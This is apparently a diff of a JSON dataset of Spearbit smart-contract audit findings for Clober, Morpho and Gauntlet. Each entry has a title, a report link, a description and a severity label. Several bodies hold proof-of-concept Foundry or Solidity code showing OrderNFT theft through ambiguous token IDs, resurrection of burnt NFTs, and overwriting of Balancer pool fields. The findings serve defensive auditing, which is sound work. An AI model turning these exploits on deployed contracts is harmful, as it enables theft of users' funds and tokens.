user: i < _MAX_ORDER - 1 ? attacker : victim, priceIndex: priceIndex, rawAmount: 0, baseAmount: victimOrderSize, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); } assertEq(orderToken.ownerOf(futureTokenId), victim); // Step 5. Attacker steals the NFT and can cancel to receive the tokens vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker, futureTokenId); vm.stopPrank(); assertEq(orderToken.ownerOf(futureTokenId), attacker); uint256 baseBalanceBefore = baseToken.balanceOf(attacker); vm.startPrank(attacker); orderKeys[0].orderIndex = orderIndex + _MAX_ORDER; orderBook.cancel(attacker, orderKeys); vm.stopPrank(); assertEq(baseToken.balanceOf(attacker) - baseBalanceBefore, victimOrderSize); } }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Critical Risk" ] }, { - "title": "WETHGateway does not validate the constructor's input parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The current implementation of the WETHGateway contracts does not validate the user's parameters during the constructor. In this specific case, the constructor should revert if morpho address is equal to ad- dress(0).", + "title": "OrderNFT theft due to ambiguous tokenId encoding/decoding scheme", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The encodeId() uniquely encodes OrderKey to a uin256 number. However, decodeId() ambigu- ously can decode many tokenId's to the exact same OrderKey. This can be problematic due to the fact that contract uses tokenId's to store approvals. The ambiguity comes from converting uint8 value to bool isBid value here function decodeId(uint256 id) public pure returns (CloberOrderBook.OrderKey memory) { uint8 isBid; uint16 priceIndex; uint232 orderIndex; assembly { orderIndex := id priceIndex := shr(232, id) isBid := shr(248, id) } return CloberOrderBook.OrderKey({isBid: isBid == 1, priceIndex: priceIndex, orderIndex: orderIndex}); ,! } (note that the attack is possible only for ASK limit orders) 11 Proof of Concept // Step 1. Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 0, baseAmount: 10**18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ambiguous tokenIds ,! CloberOrderBook.OrderKey memory order_key = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); ,! uint256 tokenId = orderToken.encodeId(order_key); uint256 ambiguous_tokenId = tokenId + (1 << 255); // crafting ambiguous tokenId // Step 3. Attacker approves both victim (can be a third-party protocol like OpenSea) and his other account ,! vm.startPrank(attacker); orderToken.approve(victim, tokenId); orderToken.approve(attacker2, ambiguous_tokenId); vm.stopPrank(); // Step 4. Victim transfers the NFT to the themselves. (Or attacker trades it) vm.startPrank(victim); orderToken.transferFrom(attacker, victim, tokenId); vm.stopPrank(); // Step 5. Attacker steals the NFT vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker2, ambiguous_tokenId); vm.stopPrank();", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Critical Risk" ] }, { - "title": "Missing/wrong natspec, typos, minor refactors and renaming of variables to be more meaningful", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "In general, the current codebase does not cover all the functions, events, structs, or state variables with proper natspec. Below you can find a list of small specific improvements regarding typos, missing/wrong natspec, or suggestions to rename variables to a more meaningful/correct name RewardsManager.sol#L28: consider renaming the balance variable in UserAssetBalance to scaledBalance PositionsManagerInternal.sol#L289-L297, PositionsManagerInternal.sol#L352-L362: consider better docu- menting this part of the code because at first sight it's not crystal clear why the code is structured in this way. For more context, see the PR comment in the spearbit audit repo linked to it. 22 MorphoInternal.sol#L469-L521: consider moving the _calculateAmountToSeize function from MorphoInt- ernal to PositionsManagerInternal contract. This function is only used internally by the PositionsMan- agerInternal. Note that there could be more instances of these kinds of \"refactoring\" of the code inside other contracts.", + "title": "Missing owner check on from when transferring tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The OrderNFT.transferFrom/safeTransferFrom use the internal _transfer function. While they check approvals on msg.sender through _isApprovedOrOwner(msg.sender, tokenId), it is never checked that the specified from parameter is actually the owner of the NFT. An attacker can decrease other users' NFT balances, making them unable to cancel or claim their NFTs and locking users' funds. The attacker transfers their own NFT passing the victim as from by calling transfer- From(from=victim, to=attackerAccount, tokenId=attackerTokenId). This passes the _isApprovedOrOwner check, but reduces from's balance.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "No validation checks on the newDefaultIterations struct", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The initialize function takes in a newDefaultIterations struct and does not perform validation for any of its fields.", + "title": "Wrong minimum net fee check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "A minimum net fee was introduced that all markets should comply by such that the protocol earns fees. The protocol fees are computed takerFee + makerFee and the market factory computes the wrong check. Fee pairs that should be accepted are currently not accepted, and even worse, fee pairs that should be rejected are currently accepted. Market creators can avoid collecting protocol fees this way.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "No validation check for newPositionsManager address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The initialize function does not ensure that the newPositionsManager is not a 0 address.", + "title": "Rounding up of taker fees of constituent orders may exceed collected fee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "If multiple orders are taken, the taker fee calculated is rounded up once, but that of each taken maker order could be rounded up as well, leading to more fees accounted for than actually taken. Example: takerFee = 100011 (10.0011%) 2 maker orders of amounts 400000 and 377000 total amount = 400000 + 377000 = 777000 Taker fee taken = 777000 * 100011 / 1000000 = 77708.547 = 777709 Maker fees would be 13 377000 * 100011 / 1000000 = 37704.147 = 37705 400000 * 100011 / 1000000 = 40004.4 = 40005 which is 1 wei more than actually taken. Below is a foundry test to reproduce the problem, which can be inserted into Claim.t.sol: function testClaimFeesFailFromRounding() public { _createOrderBook(0, 100011); // 10.0011% taker fee // create 2 orders uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); uint256 orderIndex2 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); // take both orders _createTakeOrder(Constants.BID, 2 * Constants.RAW_AMOUNT); CloberOrderBook.OrderKey[] memory ids = new CloberOrderBook.OrderKey[](2); ids[0] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); ids[1] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex2 }); // perform claim orderBook.claim( address(this), ids ); // (uint128 quoteFeeBal, uint128 baseFeeBal) = orderBook.getFeeBalance(); // console.log(quoteFeeBal); // fee accounted = 20004 // console.log(baseFeeBal); // fee accounted = 0 // console.log(quoteToken.balanceOf(address(orderBook))); // actual fee collected = 20003 // try to claim fees, will revert vm.expectRevert(\"ERC20: transfer amount exceeds balance\"); orderBook.collectFees(); }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "Missing Natspec function documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The repayLogic function currently has Natspec documentation for every function argument except for the repayer argument.", + "title": "Drain tokens condition due to reentrancy in collectFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "collectFees function is not guarded by a re-entrancy guard. In case a transfer of at least one of the tokens in a trading pair allows to invoke arbitrary code (e.g. token implementing callbacks/hooks), it is possible for a malicious host to drain trading pools. The re-entrancy condition allows to transfer collected fees multiple times to both DAO and the host beyond the actual fee counter.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "approveManagerWithSig user experience could be improved", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "With the current implementation of the approveManagerWithSig signers must wait that the previous signers have consumed the nonce to be able to call approveManagerWithSig. Inside the function, there's a specific check that will revert if the signature has been signed with a nonce that is not equal to the current one assigned to the delegator, this means that signatures that use \"future\" nonce will not be able to be approved until previous nonce has been consumed. uint256 usedNonce = _userNonce[signatory]++; if (nonce != usedNonce) revert Errors.InvalidNonce(); Let's make an example: delegator want to allow 2 managers via signature 1) Generate sig_0 for manager1 with nonce_0. 2) Generate sig_1 for manager2 with nonce_1. 3) If no-one executes approveManagerWithSig(sig_0) the sig_1 (and all the signatures based on incremented nonces) cannot be executed. It's true that at some point someone/the signer will execute it.", + "title": "Group claim clashing condition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Claim functionality is designed to support 3rd party operators to claim multiple orders on behalf of market's users to finalise the transactions, deliver assets and earn bounties. The code allows to iterate over a list of orders to execute _claim. function claim(address claimer, OrderKey[] calldata orderKeys) external nonReentrant revertOnDelegateCall { uint32 totalBounty = 0; for (uint256 i = 0; i < orderKeys.length; i++) { ... (uint256 claimedTokenAmount, uint256 minusFee, uint64 claimedRawAmount) = _claim( queue, mOrder, orderKey, claimer ); ... } } However, neither claim nor _claim functions in OrderBook support skipping already fulfilled orders. On the con- trary in case of a revert in _claim the whole transaction is reverted. function _claim(...) private returns (...) { ... require(mOrder.openOrderAmount > 0, Errors.OB_INVALID_CLAIM); ... } Such implementation does not support fully the initial idea of 3rd party operators claiming orders in batches. A transaction claiming multiple orders at once can easily clash with others and be reverted completely, effectively claiming nothing - just wasting gas. Clashing can happen for instance when two bots got overlapping lists of orders or when the owner of the order decides to claim or cancel his/her order manually while the bot is about to claim it as well. 15", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "Missing user markets check when liquidating", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The liquidation does not check if the user who gets liquidated actually joined the collateral and borrow markets.", + "title": "Order owner isn't zeroed after burning", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The order's owner is not zeroed out when the NFT is burnt. As a result, while the onBurn() method records the NFT to have been transferred to the zero address, ownerOf() still returns the current order's owner. This allows for unexpected behaviour, like being able to call approve() and safeTransferFrom() functions on non-existent tokens. A malicious actor could sell such resurrected NFTs on secondary exchanges for profit even though they have no monetary value. Such NFTs will revert on cancellation or claim attempts since openOrderAmount is zero. function testNFTMovementAfterBurn() public { _createOrderBook(0, 0); address attacker2 = address(0x1337); // Step 1: make 2 orders to avoid bal sub overflow when moving burnt NFT in step 3 uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); uint256 tokenId = orderToken.encodeId(orderKey); // Step 2: burn 1 NFT by cancelling one of the orders vm.startPrank(Constants.MAKER); orderBook.cancel( Constants.MAKER, _toArray(orderKey) ); // verify ownership is still maker assertEq(orderToken.ownerOf(tokenId), Constants.MAKER, \"NFT_OWNER\"); // Step 3: resurrect burnt token by calling safeTransferFrom orderToken.safeTransferFrom( Constants.MAKER, attacker2, tokenId ); // verify ownership is now attacker2 assertEq(orderToken.ownerOf(tokenId), attacker2, \"NFT_OWNER\"); }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "Consider reverting instead of returning zero inside repayLogic, withdrawLogic, withdrawCollater- alLogic and liquidateLogic function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Position manager always checks the user inputs via different validation functions. One of the vali- dations is that the input's amount must be greater than zero, otherwise, the transaction reverts with revert Er- rors.AmountIsZero(). The same behavior is not followed in those cases where the re-calculated amount is still zero. For example, in repayLogic after re-calculating the max amount that can be repaid by executing amount = Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount); In this case, Morpho simply executes if (amount == 0) return 0; Note that liquidateLogic should be handled differently because both the borrow amount and/or the collateral amount could be equal to zero. In this case, it would be better to revert with a different custom error based on which of the two amounts are equal to zero.", + "title": "Lack of two-step role transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The contracts lack two-step role transfer. Both the ownership of the MarketFactory as well as the change of market's host are implemented as single-step functions. The basic validation whether the address is not a zero address for a market is performed, however the case when the address receiving the role is inaccessible is not covered properly. Taking into account the handOverHost can be invoked without any supervision, by anyone who created the market it is possible to make a typo unintentionally or intentionally if the attacker wants simply to brick fees collection as currently the host affects collectFees in OrderBook (described as a separate issue). The ownership transfer in theory should be less error-prone as it should be done by DAO with great care, however still two-step role transfer should be preferable.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "PERMIT2 operations like transferFrom2 and simplePermit2 will revert if amount is greater than type(uint160).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Both Morpho.sol and PositionsManager.sol uses the Permit2 lib. The current implementation of the permit2 lib explicitly restricts the amount of token to uint160 by calling amount.toUint160() On Morpho, the amount is expressed as a uint256 and the user could, in theory, pass an amount that is greater than type(uint160).max. By doing so, the transaction would revert when it interacts with the permit2 lib.", + "title": "Atomic fees delivery susceptible to funds lockout", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The collectFees function delivers the quoteToken part of fees as well as the baseToken part of fees atomically and simultaneously to both the DAO and the host. In case a single address is for instance blacklisted (e.g. via USDC blacklist feature) or a token in a pair happens to be malicious and configured the way transfer to one of the addresses reverts it is possible to block fees delivery. 17 function collectFees() external nonReentrant { // @audit delivers both tokens atomically require(msg.sender == _host(), Errors.ACCESS); if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } function _collectFees(IERC20 token, uint256 amount) internal { // @audit delivers to both wallets uint256 daoFeeAmount = (amount * _DAO_FEE) / _FEE_PRECISION; uint256 hostFeeAmount = amount - daoFeeAmount; _transferToken(token, _daoTreasury(), daoFeeAmount); _transferToken(token, _host(), hostFeeAmount); } There are multiple cases when such situation can happen for instance: a malicious host wants to block the function for DAO to prevent collecting at least guaranteed valuable quoteToken or a hacked DAO can swap treasury to some invalid address and renounce ownership to brick collectFees across multiple markets. Taking into account the current implementation in case it is not possible to transfer tokens it is necessary to swap the problematic address, however depending on the specific case it might be not trivial.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "Both _wrapETH and _unwrapAndTransferETH do not check if the amount is zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Both _wrapETH and _unwrapAndTransferETH are not checking if the amount amount of tokens is greater than zero. If the amount is equal to zero, Morpho should avoid making the external call or simply revert.", + "title": "DAO fees potentially unavailable due to overly strict access control", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The collectFees function is guarded by an inline access control require statement condition which prevents anyone, except a host, from invoking the function. Only the host of the market is authorized to invoke, effectively deliver all collected fees, including the part of the fees belonging to the DAO. function collectFees() external nonReentrant { require(msg.sender == _host(), Errors.ACCESS); // @audit only host authorized if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } This access control is too strict and can lead to funds being locked permanently in the worst case scenario. As the host is a single point of failure in case access to the wallet is lost or is incorrectly transferred the fees for both the host and the DAO will be locked.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Medium Risk" ] }, { - "title": "Document further contraints on BucketDLL's insert and remove functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Besides the constraint that id may not be zero, there are further constraints that are required for the insert and remove functions to work correctly: insert: \"This function should not be called with an _id that is already in the list.\" Otherwise, it would overwrite the existing _id. remove: \"This function should not be called with an _id that is not in the list.\" Otherwise, it would set all of _list.accounts[0] to address(0), i.e., mark the list as empty.", + "title": "OrderNFT ownership and market host transfers are done separately", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The market host is entitled to 80% of the fees collected, and is able to set the URI of the correspond- ing orderToken NFT. However, transferring the market host and the orderToken NFT is done separately. It is thus possible for a market host to transfer one but not the other.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Low Risk" ] }, { - "title": "Important Balancer fields can be overwritten by EndTime", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Balancers ManagedPool uses 32 bit values for startTime and endTime but it does not verify if those values exist within that range. Values are stored in a 32-byte _miscData slot in BasePool via the insertUint32() function. Nevertheless, this function does not strip any excess bits, resulting in other fields stored in _miscData to be overwritten. In the version that Aera Vault uses only the \"restrict LP\" field can be overwritten and by carefully crafting the value of endTime, the \"restrict LP\" boolean can be switched off, allowing anyone to use joinPool. The Manager could cause this behavior via the updateWeightsGradually() function while the Owner could do it via enableTradingWithWeights(). Note: This issue has been reported to Balancer by the Spearbit team. contract ManagedPool is BaseWeightedPool, ReentrancyGuard { // f14de92ac443d6daf1f3a42025b1ecdb8918f22e 32 bits | 1 bit 1 bit | | restrict LP | end time 32 bits | ] 7 bits | start time | total tokens | swap flag ] | // [ 64 bits // [ reserved | // |MSB | 119 bits | unused function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, ,! _END_TIME_OFFSET) ); // this convert the values to 32 bits ... } } In the latest version of ManagedPool many more fields can be overwritten, including: LP flag Fee end/Fee start Swap flag contract ManagedPool is BaseWeightedPool, AumProtocolFeeCache, ReentrancyGuard { // current version // [ 64 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] LSB| // |MSB 1 bit | 31 bits | | 31 bits 64 bits | 32 bits | 32 bits 1 bit | | The following POC shows how fields can be manipulated. // SPDX-License-Identifier: MIT pragma solidity ^0.8.13; import \"hardhat/console.sol\"; contract checkbalancer { uint256 private constant _MASK_1 = 2**(1) - 1; uint256 private constant _MASK_31 = 2**(31) - 1; uint256 private constant _MASK_32 = 2**(32) - 1; uint256 private constant _MASK_64 = 2**(64) - 1; uint256 private constant _MASK_192 = 2**(192) - 1; 5 | | 1 bit 64 bits | | 31 bits 1 bit | 31 bits | // [ 64 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] LSB| // |MSB uint256 private constant _WEIGHT_START_TIME_OFFSET = 0; uint256 private constant _WEIGHT_END_TIME_OFFSET = 32; uint256 private constant _END_SWAP_FEE_PERCENTAGE_OFFSET = 64; uint256 private constant _FEE_START_TIME_OFFSET = 128; uint256 private constant _SWAP_ENABLED_OFFSET = 159; uint256 private constant _FEE_END_TIME_OFFSET = 160; uint256 private constant _MUST_ALLOWLIST_LPS_OFFSET = 191; uint256 private constant _SWAP_FEE_PERCENTAGE_OFFSET = 192; 32 bits | 32 bits function insertUint32(bytes32 word,uint256 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_32 << offset)); return clearedWord | bytes32(value << offset); } function decodeUint31(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_31; } function decodeUint32(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_32; } function decodeUint64(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_64; } function decodeBool(bytes32 word, uint256 offset) internal pure returns (bool) { return (uint256(word >> offset) & _MASK_1) == 1; } function insertBits192(bytes32 word,bytes32 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_192 << offset)); return clearedWord | bytes32((uint256(value) & _MASK_192) << offset); } constructor() { bytes32 poolState; bytes32 miscData; uint startTime = 1 + 2*2**32; uint endTime = 3 + 4*2**32 + 5*2**(32+64) + 2**(32+64+31) + 6*2**(32+64+31+1) + ,! 2**(32+64+31+1+31) + 7*2**(32+64+31+1+31+1); poolState = insertUint32(poolState,startTime, _WEIGHT_START_TIME_OFFSET); poolState = insertUint32(poolState,endTime, _WEIGHT_END_TIME_OFFSET); miscData = insertBits192(miscData,poolState,0); decodeUint32(miscData, console.log(\"startTime\", console.log(\"endTime\", decodeUint32(miscData, console.log(\"endSwapFeePercentage\", decodeUint64(miscData, _WEIGHT_START_TIME_OFFSET)); // 1 // 3 _WEIGHT_END_TIME_OFFSET)); _END_SWAP_FEE_PERCENTAGE_OFFSET)); ,! // 4 console.log(\"Fee startTime\", console.log(\"Swap enabled\", console.log(\"Fee endTime\", console.log(\"AllowlistLP\", decodeUint31(miscData, decodeBool(miscData, decodeUint31(miscData, decodeBool(miscData, _FEE_START_TIME_OFFSET)); // 5 _SWAP_ENABLED_OFFSET)); // true _FEE_END_TIME_OFFSET)); // 6 _MUST_ALLOWLIST_LPS_OFFSET)); // ,! true console.log(\"Swap fee percentage\", console.log(\"Swap fee percentage\", decodeUint64(poolState, _SWAP_FEE_PERCENTAGE_OFFSET)); // 7 _SWAP_FEE_PERCENTAGE_OFFSET)); // 0 decodeUint64(miscData, due to miscData conversion } ,! }", + "title": "OrderNFTs can be renamed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The OrderNFT contract's name and symbol can be changed at any time by the market host. Usually, these fields are immutable for ERC721 NFTs. There might be potential issues with off-chain indexers that cache only the original value. Furthermore, suddenly renaming tokens by a malicious market host could lead to web2 phishing attacks.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Critical Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "sweep function should prevent Treasury from withdrawing pools BPTs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The current sweep() implementation allows the vault owner (the Treasury) to sweep any token owned by the vault including BPTs (Balancer Pool Tokens) that have been minted by the Vault during the pools initialDeposit() function call. The current vault implementation does not need those BPTs to withdraw funds because they are passed directly through the AssetManager flow via withdraw()/finalize(). Being able to withdraw BPTs would allow the Treasury to: Withdraw funds without respecting the time period between initiateFinalization() and finalize() calls. Withdraw funds without respecting Validator allowance() limits. Withdraw funds without paying the managers fee for the last withdraw(). finalize the pool, withdrawing all funds and selling valueless BPTs on the market. Sell or rent out BPTs and withdraw() funds afterwards, thus doubling the funds. Swap fees would not be paid because Treasury could call setManager(newManager), where the new manager is someone controlled by the Treasury, subsequently calling setSwapFee(0) to remove the swap fee, which would be applied during an exitPool() event. Note: Once the BPT is retrieved it can also be used to call exitPool(), as the mustAllowlistLPs check is ignored in exitPool().", + "title": "DOSing _replaceStaleOrder() due to reverting on token transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "In the case of tokens with implemented hooks, a malicious order owner can revert on token received event thus cause a denial-of-service via _replaceStaleOrder(). The probability of such an attack is very low, because the order queue has to be full and it is unusual for tokens to implement hooks.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: Critical Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "Manager can cause an immediate weight change", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Balancers ManagedPool uses 32 bit values for startTime and endTime but it does not verify if those values exist within that range. When endTime is set to 2**32 it becomes larger than startTime so the _require(startTime <= endTime, ...) statement will not revert. When endTime is converted to 32 bits it will get a value of 0, so in _calcu- lateWeightChangeProgress() the test if (currentTime >= endTime) ... will be true, causing the weight to immediately reach the end value. This way the Manager can cause an immediate weight change via the updateWeightsGradually() function and open arbitrage opportunities. Note: startTime is also subject to this overflow problem. Note: the same issues occur in the latest version of ManagedPool. Note: This issue has been reported to Balancer by the Spearbit team. 7 Also see the following issues: Managed Pools are still undergoing development and may contain bugs and/or change significantly Important fields of Balancer can be overwritten by EndTime contract ManagedPool is BaseWeightedPool, ReentrancyGuard { function updateWeightsGradually(uint256 startTime, uint256 endTime, ... ) { ... uint256 currentTime = block.timestamp; startTime = Math.max(currentTime, startTime); _require(startTime <= endTime, Errors.GRADUAL_UPDATE_TIME_TRAVEL); // will not revert if ,! endTime == 2**32 ... _startGradualWeightChange(startTime, endTime, _getNormalizedWeights(), endWeights, tokens); } function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, ,! _END_TIME_OFFSET) ); // this convert the values to 32 bits ... } function _calculateWeightChangeProgress() private view returns (uint256) { uint256 currentTime = block.timestamp; bytes32 poolState = _getMiscData(); uint256 startTime = poolState.decodeUint32(_START_TIME_OFFSET); uint256 endTime = poolState.decodeUint32(_END_TIME_OFFSET); if (currentTime >= endTime) { // will be true if endTime == (2**32) capped to 32 bits == 0 return FixedPoint.ONE; } else ... ... } }", + "title": "Total claimable bounties may exceed type(uint32).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Individual bounties are capped to type(uint32).max which is ~4.295 of a native token of 18 decimals (4.2949673e18 wei). It's possible (and likely in the case of Polygon network) for their sum to therefore exceed type(uint32).max.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "deposit and withdraw functions are susceptible to sandwich attacks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "Transactions calling the deposit() function are susceptible to sandwich attacks where an attacker can extract value from deposits. A similar issue exists in the withdraw() function but the minimum check on the pool holdings limits the attacks impact. Consider the following scenario (swap fees ignored for simplicity): 1. Suppose the Balancer pool contains two tokens, WETH and DAI, and weights are 0.5 and 0.5. Currently, there is 1 WETH and 3k DAI in the pool and WETH spot price is 3k. 2. The Treasury wants to add another 3k DAI into the Aera vault, so it calls the deposit() function. 3. The attacker front-runs the Treasurys transaction. They swap 3k DAI into the Balancer pool and get out 0.5 WETH. The weights remain 0.5 and 0.5, but because WETH and DAI balances become 0.5 and 6k, WETHs spot price now becomes 12k. 4. Now, the Treasurys transaction adds 3k DAI into the Balancer pool and upgrades the weights to 0.5*1.5: 0.5 = 0.6: 0.4. 5. The attacker back-runs the transaction and swaps the 0.5 WETH they got in step 3 back to DAI (and recovers the WETHs spot price to near but above 3k). According to the current weights, they can get 9k*(1 - 1/r) = 3.33k DAI from the pool, where r = (20.4)(1/0.6). 6. As a result the attacker profits 3.33k - 3k = 0.33k DAI.", + "title": "Can fake market order in TakeOrder event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Market orders in Orderbook.marketOrder set the 8-th bit of options. This options value is later used in _take's TakeOrder event. However, one can call Orderbook.limitOrder with this 8-th bit set and spoof a market order event.", "labels": [ "Spearbit", - "Gauntlet", - "Severity: High Risk" + "Clober", + "Severity: Low Risk" ] }, { - "title": "allowance() doesnt limit withdraw()s", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", - "body": "The allowance() function is meant to limit withdraw amounts. However, allowance() can only read and not alter state because its visibility is set to view. Therefore, the withdraw() function can be called on demand until the entire Vault/Pool balance has been drained, rendering the allowance() function ineffective. function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory allowances = validator.allowance(); ... for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable(... ); } } } // can't update state due to view function allowance() external view override returns (uint256[] memory amounts) { amounts = new uint256[](count); for (uint256 i = 0; i < count; i++) { amounts[i] = ANY_AMOUNT; } } from both IWithdrawal-", + "title": "_priceToIndex will revert if price is type(uint128).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "Because price is type uint128, the increment will overflow first before it is casted to uint256 uint256 shiftedPrice = uint256(price + 1) << 